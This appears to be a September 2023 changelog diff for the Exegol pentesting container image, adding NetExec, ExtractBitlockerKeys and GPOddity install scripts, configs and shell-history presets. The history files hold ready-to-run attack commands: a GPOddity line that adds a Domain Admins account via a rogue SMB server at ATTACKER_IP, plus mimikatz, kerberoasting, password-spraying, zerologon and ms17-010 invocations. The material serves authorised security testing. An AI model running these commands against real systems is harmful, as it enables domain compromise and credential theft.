New tools and fixes - September 2023

sources/assets/netexec/nxc.conf

@@ -0,0 +1,25 @@
+[NXC]
+workspace = default
+last_used_db = smb
+pwn3d_label = admin
+audit_mode =
+log_mode = False
+ignore_opsec = True
+
+[BloodHound]
+bh_enabled = False
+bh_uri = 127.0.0.1
+bh_port = 7687
+bh_user = neo4j
+bh_pass = exegol4thewin
+
+[Empire]
+api_host = 127.0.0.1
+api_port = 1337
+username = empireadmin
+password = exegol4thewin
+
+[Metasploit]
+rpc_host = 127.0.0.1
+rpc_port = 55552
+password = abc123

sources/assets/zsh/aliases.d/extractbitlockerkeys

@@ -0,0 +1 @@
+alias extractbitlockerkeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/ExtractBitlockerKeys.py"

sources/assets/zsh/aliases.d/netexec

@@ -0,0 +1,2 @@
+alias netexec-neo4j-enable='sed -i "s/bh_enabled = False/bh_enabled = True/" ~/.nxc/nxc.conf'
+alias netexec-neo4j-disable='sed -i "s/bh_enabled = True/bh_enabled = False/" ~/.nxc/nxc.conf'

sources/assets/zsh/history.d/GPOddity

@@ -1,2 +1,2 @@
-gpoddity.py --gpo-id '46993522-7D77-4B59-9B77-F82082DE9D81' --domain "$DOMAIN" --username 'GPODDITY$' --password "$PASSWORD" --command 'net user attackeradmin exegol4thewin! /add && net localgroup administrators attackeradmin /add' --rogue-smbserver-ip "$ATTACKER_IP" --rogue-smbserver-share "EXEGOL"
-gpoddity.py --gpo-id '7B36419B-B566-46FA-A7B7-58CA9030A604' --gpo-type 'user' --no-smb-server --domain "$DOMAIN" --username 'GPODDITY$' --password "$PASSWORD" --command 'net user attackeradmin exegol4thewin! /add /domain && net group "Domain Admins" attackeradmin /ADD /DOMAIN' --rogue-smbserver-ip "$ATTACKER_IP" --rogue-smbserver-share "EXEGOL"
+gpoddity --gpo-id '46993522-7D77-4B59-9B77-F82082DE9D81' --domain "$DOMAIN" --username 'GPODDITY$' --password "$PASSWORD" --command 'net user attackeradmin exegol4thewin! /add && net localgroup administrators attackeradmin /add' --rogue-smbserver-ip "$ATTACKER_IP" --rogue-smbserver-share "EXEGOL"
+gpoddity --gpo-id '7B36419B-B566-46FA-A7B7-58CA9030A604' --gpo-type 'user' --no-smb-server --domain "$DOMAIN" --username 'GPODDITY$' --password "$PASSWORD" --command 'net user attackeradmin exegol4thewin! /add /domain && net group "Domain Admins" attackeradmin /ADD /DOMAIN' --rogue-smbserver-ip "$ATTACKER_IP" --rogue-smbserver-share "EXEGOL"

sources/assets/zsh/history.d/extractbitlockerkeys

@@ -0,0 +1 @@
+extractbitlockerkeys.py -dc-ip $DC_IP -Username $USERNAME -Password $PASSWORD -ExportToCSV ./keys.csv -ExportToJSON ./keys.json

sources/assets/zsh/history.d/netexec

@@ -0,0 +1,21 @@
+netexec smb --list-modules
+netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
+netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
+netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
+netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
+netexec smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
+netexec smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
+netexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
+netexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
+netexec smb "$TARGET" -u '' -p '' --pass-pol
+netexec smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
+netexec smb 192.168.56.0/24 --local-auth -u '' -p ''
+netexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users
+netexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions
+netexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares
+netexec smb 192.168.56.0/24 -u '' -p '' --shares
+netexec smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac
+netexec smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam
+netexec smb "$IP" -u '' -p '' -M zerologon
+netexec smb "$IP" -u '' -p '' -M ms17-010
+netexec smb "$IP" -u '' -p '' -M ioxidresolver

sources/install/common.sh

@@ -52,6 +52,11 @@ function fapt() {
     apt-fast install -y --no-install-recommends "$@"
 }
 
+function set_cargo_env() {
+    colorecho "Setting cargo environment variables for installation"
+    source /root/.zshrc || true
+}
+
 function set_go_env() {
     colorecho "Setting golang environment variables for installation"
     export GO111MODULE=auto

sources/install/package_ad.sh

@@ -90,9 +90,6 @@ function install_ldapdomaindump() {
 
 function install_crackmapexec() {
     colorecho "Installing CrackMapExec"
-    # Source bc cme needs cargo PATH (rustc) -> aardwolf dep
-    # TODO: Optimize so that the PATH is always up to date
-    source /root/.zshrc || true
     git -C /opt/tools/ clone --depth 1 https://github.com/Porchetta-Industries/CrackMapExec
     pipx install /opt/tools/CrackMapExec/
     mkdir -p ~/.cme
@@ -989,20 +986,45 @@ function install_teamsphisher() {
 }
 
 function install_GPOddity() {
-  colorecho "Installing GPOddity"
-  git -C /opt/tools/ clone --depth 1 https://github.com/synacktiv/GPOddity
-  cd /opt/tools/GPOddity || exit
-  python3 -m venv ./venv
-  catch_and_retry ./venv/bin/python3 -m pip install -r requirements.txt
-  add-aliases GPOddity
-  add-history GPOddity
-  add-test-command "gpoddity.py --help"
-  add-to-list "GPOddity,https://github.com/synacktiv/GPOddity,Aiming at automating GPO attack vectors through NTLM relaying (and more)"
+    # CODE-CHECK-WHITELIST=add-aliases
+    colorecho "Installing GPOddity"
+    pipx install git+https://github.com/synacktiv/GPOddity
+    add-history GPOddity
+    add-test-command "gpoddity --help"
+    add-to-list "GPOddity,https://github.com/synacktiv/GPOddity,Aiming at automating GPO attack vectors through NTLM relaying (and more)"
+}
+
+function install_netexec() {
+    colorecho "Installing netexec"
+    git -C /opt/tools/ clone --depth 1 https://github.com/Pennyw0rth/NetExec
+    pipx install /opt/tools/NetExec/
+    mkdir -p ~/.nxc
+    [ -f ~/.nxc/nxc.conf ] && mv ~/.nxc/nxc.conf ~/.nxc/nxc.conf.bak
+    cp -v /root/sources/assets/netexec/nxc.conf ~/.nxc/nxc.conf
+    # below is for having the ability to check the source code when working with modules and so on
+    cp -v /root/sources/assets/grc/conf.cme /usr/share/grc/conf.cme
+    add-aliases netexec
+    add-history netexec
+    add-test-command "netexec --help"
+    add-to-list "netexec,https://github.com/Pennyw0rth/NetExec,Network scanner (Crackmapexec updated)."
+}
+
+function install_extractbitlockerkeys() {
+    colorecho "Installing ExtractBitlockerKeys"
+    git -C /opt/tools/ clone --depth 1 https://github.com/p0dalirius/ExtractBitlockerKeys
+    cd /opt/tools/ExtractBitlockerKeys
+    python3 -m venv ./venv
+    ./venv/bin/python3 -m pip install -r requirements.txt
+    add-aliases extractbitlockerkeys
+    add-history extractbitlockerkeys
+    add-test-command "extractbitlockerkeys.py|& grep 'usage: ExtractBitlockerKeys.py'"
+    add-to-list "ExtractBitlockerKeys,https://github.com/p0dalirius/ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain."
 }
 
 # Package dedicated to internal Active Directory tools
 function package_ad() {
     install_ad_apt_tools
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env
@@ -1084,4 +1106,6 @@ function package_ad() {
     install_roadtools              # Rogue Office 365 and Azure (active) Directory tools
     install_teamsphisher           # TeamsPhisher is a Python3 program that facilitates the delivery of phishing messages and attachments to Microsoft Teams users whose organizations allow external communications.
     install_GPOddity
+    install_netexec                # Crackmapexec repo
+    install_extractbitlockerkeys   # Extract Bitlocker recovery keys from all the computers of the domain
 }

sources/install/package_c2.sh

@@ -43,10 +43,13 @@ function install_routersploit() {
 function install_sliver() {
     # CODE-CHECK-WHITELIST=add-aliases
     colorecho "Installing Sliver"
-    git -C /opt/tools/ clone --depth 1 https://github.com/BishopFox/sliver.git
+    # Deletion of --depth 1 due to installation of stable branch
+    git -C /opt/tools/ clone https://github.com/BishopFox/sliver.git
     cd /opt/tools/sliver
-    make
-    mv sliver-* /opt/tools/bin
+    git checkout tags/v1.5.39
+    make linux
+    ln -s /opt/tools/sliver/sliver-server /opt/tools/bin/sliver-server
+    ln -s /opt/tools/sliver/sliver-client /opt/tools/bin/sliver-client
     add-history sliver
     add-test-command "sliver-server help"
     add-test-command "sliver-client help"
@@ -55,6 +58,7 @@ function install_sliver() {
 
 # Package dedicated to command & control frameworks
 function package_c2() {
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env

sources/install/package_cloud.sh

@@ -116,6 +116,7 @@ function install_azure_cli() {
 
 # Package dedicated to cloud tools
 function package_cloud() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_kubectl

sources/install/package_code_analysis.sh

@@ -46,6 +46,7 @@ function install_pp-finder() {
 
 # Package dedicated to SAST and DAST tools
 function package_code_analysis() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_vulny-code-static-analysis

sources/install/package_cracking.sh

@@ -80,6 +80,7 @@ function install_pkcrack() {
 
 # Package dedicated to offline cracking/bruteforcing tools
 function package_cracking() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_cracking_apt_tools

sources/install/package_crypto.sh

@@ -40,6 +40,7 @@ function install_rsacracker() {
 
 # Package dedicated to attack crypto
 function package_crypto() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_rsactftool              # attack rsa

sources/install/package_forensic.sh

@@ -113,6 +113,7 @@ function install_chainsaw() {
 
 # Package dedicated to forensic tools
 function package_forensic() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_forensic_apt_tools

sources/install/package_iot.sh

@@ -20,6 +20,7 @@ function install_iot_apt_tools() {
 
 # Package dedicated to IoT tools
 function package_iot() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_iot_apt_tools

sources/install/package_misc.sh

@@ -163,6 +163,7 @@ function install_yt-dlp() {
 
 # Package dedicated to offensive miscellaneous tools
 function package_misc() {
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env

sources/install/package_mobile.sh

@@ -92,6 +92,7 @@ function install_androguard() {
 
 # Package dedicated to mobile apps pentest tools
 function package_mobile() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_mobile_apt_tools

sources/install/package_most_used.sh

@@ -52,6 +52,7 @@ function install_most_used_apt_tools() {
 
 # Package dedicated to most used offensive tools
 function package_most_used() {
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env
@@ -85,4 +86,5 @@ function package_most_used() {
     install_evilwinrm               # WinRM shell
     install_john                    # Password cracker
     install_sqlmap                  # SQL injection scanner
+    install_netexec                 # Crackmapexec repo
 }

sources/install/package_network.sh

@@ -205,21 +205,11 @@ function install_tailscale() {
 
 function install_ligolo-ng() {
     colorecho "Installing ligolo-ng"
-    # Waiting for the issue to be resolved
-    # https://github.com/nicocha30/ligolo-ng/issues/32
-    mkdir /tmp/ligolo
-    if [[ $(uname -m) = 'x86_64' ]]
-    then
-        wget -O /tmp/ligolo/proxy.tar.gz "https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_proxy_0.4.4_linux_amd64.tar.gz"
-    elif [[ $(uname -m) = 'aarch64' ]]
-    then
-        wget -O /tmp/ligolo/proxy.tar.gz "https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_proxy_0.4.4_linux_arm64.tar.gz"
-    else
-        criticalecho-noexit "This installation function doesn't support architecture $(uname -m)" && return
-    fi
-    tar -xvf /tmp/ligolo/proxy.tar.gz -C /tmp/ligolo
-    mv /tmp/ligolo/proxy /opt/tools/bin/ligolo-ng
-    rm -rf /tmp/ligolo
+    git -C /opt/tools clone --depth 1 https://github.com/nicocha30/ligolo-ng.git
+    cd /opt/tools/ligolo-ng
+    go build -o agent cmd/agent/main.go
+    go build -o proxy cmd/proxy/main.go
+    ln -s /opt/tools/ligolo-ng/proxy /opt/tools/bin/ligolo-ng
     add-history ligolo-ng
     add-test-command "ligolo-ng --help"
     add-to-list "ligolo-ng,https://github.com/nicocha30/ligolo-ng,An advanced yet simple tunneling tool that uses a TUN interface."
@@ -243,6 +233,7 @@ function install_rustscan() {
 
 # Package dedicated to network pentest tools
 function package_network() {
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env

sources/install/package_osint.sh

@@ -495,6 +495,7 @@ function install_gomapenum() {
 
 # Package dedicated to osint, recon and passive tools
 function package_osint() {
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env

sources/install/package_reverse.sh

@@ -139,6 +139,7 @@ function install_pwninit() {
 
 # Package dedicated to reverse engineering tools
 function package_reverse() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_reverse_apt_tools

sources/install/package_rfid.sh

@@ -87,6 +87,7 @@ function install_proxmark3() {
 
 # Package dedicated to RFID/NCF pentest tools
 function package_rfid() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_rfid_apt_tools

sources/install/package_sdr.sh

@@ -50,6 +50,7 @@ function install_jackit() {
 
 # Package dedicated to SDR
 function package_sdr() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_sdr_apt_tools

sources/install/package_steganography.sh

@@ -50,6 +50,7 @@ function install_stegolsb() {
 
 # Package dedicated to steganography tools
 function package_steganography() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_steganography_apt_tools

sources/install/package_voip.sh

@@ -14,6 +14,7 @@ function install_sipvicious() {
 
 # Package dedicated to VOIP/SIP pentest tools
 function package_voip() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_sipvicious              # Set of tools for auditing SIP based VOIP systems

sources/install/package_web.sh

@@ -56,8 +56,13 @@ function install_wfuzz() {
     apt --purge remove python3-pycurl -y
     fapt libcurl4-openssl-dev libssl-dev
     pip3 install pycurl wfuzz
+    mkdir /usr/share/wfuzz
+    git -C /tmp clone --depth 1 https://github.com/xmendez/wfuzz.git
+    mv /tmp/wfuzz/wordlist/* /usr/share/wfuzz
+    rm -rf /tmp/wfuzz
     add-history wfuzz
     add-test-command "wfuzz --help"
+    add-test-command "[ -d '/usr/share/wfuzz/' ] || exit 1"
     add-to-list "wfuzz,https://github.com/xmendez/wfuzz,WFuzz is a web application vulnerability scanner that allows you to find vulnerabilities using a wide range of attack payloads and fuzzing techniques"
 }
 
@@ -766,10 +771,11 @@ function install_sqlmap() {
 
 # Package dedicated to applicative and active web pentest tools
 function package_web() {
-    install_web_apt_tools
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env
+    install_web_apt_tools
     install_weevely                 # Weaponized web shell
     install_whatweb                 # Recognises web technologies including content management
     install_wfuzz                   # Web fuzzer (second favorites)

sources/install/package_wifi.sh

@@ -102,6 +102,7 @@ function install_hcxdumptool() {
 
 # Package dedicated to wifi pentest tools
 function package_wifi() {
+    set_cargo_env
     set_go_env
     set_ruby_env
     set_python_env

sources/install/package_wordlists.sh

@@ -81,6 +81,7 @@ function install_genusernames() {
 
 # Package dedicated to the installation of wordlists and tools like wl generators
 function package_wordlists() {
+    set_cargo_env
     set_ruby_env
     set_python_env
     install_wordlists_apt_tools